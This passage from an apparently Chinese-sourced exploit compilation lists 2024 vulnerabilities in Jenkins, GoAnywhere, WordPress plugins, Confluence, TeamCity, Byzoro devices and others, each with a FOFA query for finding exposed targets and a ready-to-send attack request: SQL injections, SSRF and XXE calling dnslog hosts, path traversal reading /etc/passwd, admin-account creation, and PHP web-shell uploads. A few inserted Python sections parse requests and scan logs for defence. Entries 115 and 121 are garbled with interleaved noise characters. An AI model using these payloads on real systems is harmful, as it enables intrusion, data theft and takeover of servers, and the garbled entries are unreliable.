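With the unsafe builder the injected name reaches the database engine unchanged (sqlite3 rejects it only because it has no updatexml() function; MySQL would evaluate it); with the allowlist builder it never becomes SQL at all. The same allowlist check belongs in front of any "filter by arbitrary field" endpoint, regardless of ORM.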
108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

(The body is sent as raw bytes; the b'...' form above is the Python literal.)

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response on the download side (lines of /etc/passwd come back inside the error message):
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


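The upload body is not opaque: it is a sequence of CLI protocol frames, and the bug is that the argument parser (args4j) expands any argument of the form @path by reading that file and splicing its lines in as further arguments, which is why the file's lines surface in the "Too many arguments" error. The following is an added example, not part of the original post and not Jenkins code: a Python parser and builder for that frame layout, derived from the POC bytes above (4-byte big-endian length of the data after the opcode, 1 opcode byte, then a Java-style length-prefixed UTF string; ARG=0, LOCALE=1, ENCODING=2, START=3 are read off the POC and are the only opcodes it assumes). It exposes exactly what a WAF or IDS rule should look at: the ARG frames, and any of them that starts with @.

```python
import struct

# Opcodes of the Jenkins CLI "plain" protocol spoken over /cli?remoting=false.
# These four are the ones the POC body above uses; the numbering is read off
# that body (ARG=0, LOCALE=1, ENCODING=2, START=3).
OPS = {0: "ARG", 1: "LOCALE", 2: "ENCODING", 3: "START"}

# Constructed input: the upload body from the POC above, as raw bytes.
POC_BODY = (
    b"\x00\x00\x00\x06\x00\x00\x04help"
    b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
    b"\x00\x00\x00\x05\x02\x00\x03GBK"
    b"\x00\x00\x00\x07\x01\x00\x05en_US"
    b"\x00\x00\x00\x00\x03"
)


def parse_frames(body: bytes) -> list:
    """Split an upload body into (opcode name, text) pairs.

    Frame layout, as the POC bytes show: a 4-byte big-endian length of the data
    that follows the opcode, 1 opcode byte, then the data.  ARG/LOCALE/ENCODING
    carry a Java-style UTF string (2-byte big-endian length + bytes); START has
    no data at all.
    """
    frames, pos = [], 0
    while pos < len(body):
        if pos + 5 > len(body):
            raise ValueError("truncated frame header")
        (length,) = struct.unpack_from(">I", body, pos)
        op = body[pos + 4]
        data = body[pos + 5 : pos + 5 + length]
        if len(data) != length:
            raise ValueError("truncated frame data")
        text = ""
        if length >= 2:
            (slen,) = struct.unpack_from(">H", data, 0)
            text = data[2 : 2 + slen].decode("utf-8")
        frames.append((OPS.get(op, f"OP_{op}"), text))
        pos += 5 + length
    return frames


def cli_args(body: bytes) -> list:
    """The argv the server hands to the CLI command parser."""
    return [text for op, text in parse_frames(body) if op == "ARG"]


def file_read_attempts(body: bytes) -> list:
    """Arguments that args4j expands as '@file' (the file's lines become
    arguments, which is the whole bug).  Returns the paths being read."""
    return [arg[1:] for arg in cli_args(body) if arg.startswith("@")]


def build_frame(op: int, text=None) -> bytes:
    """Inverse of parse_frames for one frame; text=None gives a data-less frame."""
    data = b"" if text is None else struct.pack(">H", len(text.encode())) + text.encode()
    return struct.pack(">I", len(data)) + bytes([op]) + data
```

A request-side rule that rebuilds the frames and rejects any ARG beginning with @ catches the primitive regardless of which command (help, connect-node, who-am-i and so on) is used to trigger it; the fix shipped in Jenkins 2.442 / LTS 2.426.3 disables the @file expansion, and the CLI can also be turned off entirely until patched.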
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


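Entries 91 (Hikvision) and 110 (GoAnywhere) rely on the same trick: a servlet container such as Tomcat strips ";name=value" path parameters from each segment before mapping the request, so "..;" is just ".." to the container, while a front-end filter that compares the raw URI against an allow-listed prefix (/center/api/task/ and /goanywhere/images/ here) still believes the request is harmless. The following is an added example, not part of the original post and not code from either vendor: a Python normaliser that mimics that mapping plus a scanner that runs it over access-log lines and reports both the effective path and why the request was flagged. The log lines are constructed for the demonstration and the combined-log regex is a plain assumption about the log format.

```python
import re
from urllib.parse import parse_qsl, unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample log lines (combined log format) covering POCs 91 and 110
# plus two benign requests, one carrying an ordinary ;jsessionid path parameter.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Feb/2024:10:00:01 +0000] "GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1" 200 1821
10.0.0.5 - - [01/Feb/2024:10:00:02 +0000] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 5120
10.0.0.7 - - [01/Feb/2024:10:00:03 +0000] "GET /goanywhere/images/logo.png HTTP/1.1" 200 3000
10.0.0.9 - - [01/Feb/2024:10:00:04 +0000] "GET /center/api/task/list;jsessionid=1A2B3C HTTP/1.1" 200 300
"""


def servlet_normalize(path: str) -> str:
    """Map a raw URI path to the path a servlet container actually dispatches.

    Tomcat removes ';name=value' path parameters from each segment before
    matching, so '..;' is just '..', and then resolves '.' and '..'.  A
    front-end filter that checks the raw URI against an allow-listed prefix
    therefore sees a different path than the one that is finally served.
    """
    out = []
    for seg in path.split("/"):
        seg = unquote(seg).split(";", 1)[0]
        if seg == "..":
            if out:
                out.pop()
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out)


def analyse_request(target: str) -> dict:
    """Return the effective path and the reasons (if any) a request is suspicious."""
    raw_path, _, query = target.partition("?")
    reasons = []
    for seg in raw_path.split("/"):
        seg = unquote(seg)
        name, has_param = seg.split(";", 1)[0], ";" in seg
        if name == "..":
            reasons.append("path-parameter traversal (..;)" if has_param else "dot-dot segment")
    for key, value in parse_qsl(query, keep_blank_values=True):
        if "../" in unquote(value) or "..\\" in unquote(value):
            reasons.append(f"traversal in query parameter {key}")
    return {"raw_path": raw_path, "effective_path": servlet_normalize(raw_path), "reasons": reasons}


def scan_access_log(text: str) -> list:
    """Flag log lines whose request normalises to somewhere other than it claims."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        info = analyse_request(m.group("target"))
        if info["reasons"]:
            info.update(ip=m.group("ip"), status=int(m.group("status")))
            hits.append(info)
    return hits
```

The effective path is what to compare against your authentication rules: if it lands under a protected prefix while the raw URI started under an exempt one, the filter was bypassed. The durable fix on the application side is to authorise on the container-normalised path (or to reject any segment containing ".." or ";" before the filter chain runs) rather than on the raw request URI.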
111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


, z" ]0 h0 @' D' W# K9 e115. WordPress Bricks Builder <= 1.9.6 RCE: D6 o4 d" j: @. Y+ ?' W( ^
CVE-2024-256006 R/ b% p3 v6 q: w) _
FOFA: body="/wp-content/themes/bricks/"0 }. c1 q6 Z) J8 d5 B7 G1 j5 Q
第一步,获取网站的nonce值$ }4 f& s" L  {- q  p; P3 U
GET / HTTP/1.1  @9 e4 q8 }# N9 o9 n5 `+ d! L
Host: x.x.x.x
2 Y) a6 x% ?+ kUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36- A. x9 s$ ]9 Y! @3 S% P$ y
Connection: close: s6 N' A/ Q, W9 k- c% L( c. t
Accept-Encoding: gzip
, e: m7 o2 g" \  Q# c2 J- X
# h% Y: H, s+ o- s* j* w( L& D3 Q( N" V/ D( W. w7 v' h
第二步替换nonce值,执行命令/ M" s# {0 c' a8 G+ Q" w
POST /wp-json/bricks/v1/render_element HTTP/1.1
0 W+ Q1 o1 r  L, a* L3 `Host: x.x.x.x5 e) x" J% ]: g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36+ g" I: W$ p) X; W; n) h( \( n
Connection: close. E- E8 h- y; @
Content-Length: 356$ O0 t  g! w  p. T" D
Content-Type: application/json
0 m# ]$ E8 S4 D& bAccept-Encoding: gzip
/ i' s; i2 s. Y5 X" p5 l' S+ V9 b$ M0 e7 n, o% g
{
1 v( P% x4 T5 _+ _# N, P8 d"postId": "1",
9 D+ d( [5 w5 ~' V" E" x4 ~) C/ G8 e  "nonce": "第一步获得的值",
- Y: q$ D* W% z( j0 @  "element": {- J* e8 {% P7 _6 E) b/ ~- w+ l+ V
    "name": "container",) K( `  ?( J$ q! b) d* }
    "settings": {
' q( `1 ]7 q& l% c" f1 C+ D      "hasLoop": "true",% Y7 P  x) i. F
      "query": {
( j$ x: v0 f5 [& `9 ^& f# i        "useQueryEditor": true," Q# W) ]7 D  T2 S- L9 d
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",; k. f( m8 F/ [" u# `- E. a: w
        "objectType": "post"
1 l5 H$ w1 u$ C& k' I      }7 b/ y6 B( X) C* k
    }
: _( W. F) f+ l6 A7 U' N  }! l6 U1 J9 p( u: ]) z; m9 }
}9 ^! [1 C0 }4 q6 i7 N6 {4 c

* o, V3 a' F" ^% u8 E- x4 y/ {$ V# k: ?0 V
116. WordPress js-support-ticket plugin file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 to 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Byzoro (百卓) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


The txt_path field controls where the upload is written; then request /home/src.php.

119. Byzoro (百卓) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin. Then send:
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Byzoro (百卓) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


Uploaded file path: /upload/2.php

+ ]1 z# p" F$ v8 L1 i121. 北京百绰智能S42管理平台userattestation.php任意文件上传/ k* Z1 z$ n7 I" c# F
CVE-2024-19184 d" D% ~! E, i; S9 @3 H, g
FOFA:title="Smart管理平台"+ [3 i6 q$ u% q. }$ ]7 z) R
POST /useratte/userattestation.php HTTP/1.1* e4 O, j, o* v* ^1 t) J, y" V
Host: 192.168.40.130:84437 l# ^$ I2 g+ s3 h  M3 b/ x" ^
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac505 W/ h- F8 |/ L* W9 g
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  l) l6 v* {; b4 t! V' ?+ hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 j& o2 @8 K5 t5 {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; k  V+ s0 D7 ?" b* kAccept-Encoding: gzip, deflate
7 u* L, a: P$ h* B2 D3 Y# @4 q# iContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328$ s) R+ p% d; k/ F6 N5 k
Content-Length: 5929 Z0 a/ P0 k$ Z! F2 R6 m7 [6 f. d
Origin: https://192.168.40.130:8443
  o# w# r8 C# o+ b  ZUpgrade-Insecure-Requests: 1
8 A! i, E4 _, Y- P7 k( F$ gSec-Fetch-Dest: document
) X8 B3 Y3 c6 I. a& oSec-Fetch-Mode: navigate
  @% T4 r. P! s) kSec-Fetch-Site: same-origin
% O7 t. c! P2 [. c3 C2 f; P8 kSec-Fetch-User: ?1
6 Q$ g! r# \5 c) PTe: trailers
! \& \$ S7 T" P# a6 V/ u! iConnection: close
: m/ M8 e: Z6 u& b9 N/ e* y4 P
% k0 N3 M6 ~& U$ R2 |-----------------------------423289041236658752706300793285 Y: @! p; {# X
Content-Disposition: form-data; name="web_img"; filename="1.php"
5 H5 W% Q% E, h  d) \; d' x4 DContent-Type: application/octet-stream
# e  h; g6 r& J) ]" M2 m% o& l
  Q! u6 ^. v0 i<?php phpinfo();?>: W( n( O7 h" F5 O
-----------------------------42328904123665875270630079328
- {7 S4 c" _! b0 r% L+ [5 DContent-Disposition: form-data; name="id_type"
9 O& P9 Z# ?' M1 a7 z& h% U: R& n. o$ X% @
1+ M* b( W8 A4 [/ z: R
-----------------------------42328904123665875270630079328
$ |0 h. M! }0 e) r0 K+ AContent-Disposition: form-data; name="1_ck"# `5 O2 W2 c8 c7 D
( G( t8 f6 N1 G
1_radhttp: K3 a7 X  ?, K. \1 \3 q
-----------------------------42328904123665875270630079328
* i' a( u$ {3 H. w: R0 D% I4 YContent-Disposition: form-data; name="hidwel"
, I+ C0 O& u# `! P) X8 b8 g1 b9 o; c
set
! }. q/ K" T+ H/ v' _$ f-----------------------------423289041236658752706300793282 K/ {/ a. A- ^& L! m: h- U& h
4 i$ T5 Y: C/ D: N& B
+ s2 t% N  Y5 _" I: c
boot/web/upload/weblogo/1.php9 s0 k- A* x, I
& j6 O2 o1 l, k% J: b* P. R
122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter is the SQL statement base64-encoded: sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Written file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend with it; system commands can then be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affects Adobe ColdFusion 2018u17 and earlier, 2021u7 and earlier, and 2023u1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

